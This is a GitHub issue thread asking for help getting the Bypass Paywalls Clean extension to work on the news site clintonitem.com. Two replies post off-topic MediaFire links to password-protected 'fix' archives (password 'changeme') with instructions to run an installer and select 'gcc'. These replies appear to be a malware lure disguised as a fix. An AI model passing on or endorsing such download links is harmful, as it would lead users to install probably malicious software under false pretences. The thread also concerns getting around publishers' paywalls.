### ISSUE TITLE
Request [clintonitem.com]

### ISSUE THREAD

**Issue by r104444** [bpc-clone/bpc_chrome_support#217]
Describe issue/request: **I have tried every combination of custom unlocking I can think of for clintonitem.com and nothing seems to work. Curious if someone smarter than me can give me a combo that works.** 

Link of paywalled article: **clintonitem.com**

Actions you tried yourself (mandatory) and if it works (clear cookies, disable javascript, change user-agent/referer, reader view, archive sites and/or add a custom site): **tried any combination i can think of with cookies and facebook/google/bing**

Browser (main version): **chrome**

BPC-extension version (number): **Bypass Paywalls Clean v3.8.1.1 

Thanks for any help or confirmation it isjust is not possible.**

**Comment by dseynhae** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by mohamed-elsankary** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by bpc-clone** [comment]
Site has hard paywall (no fix), it seems.
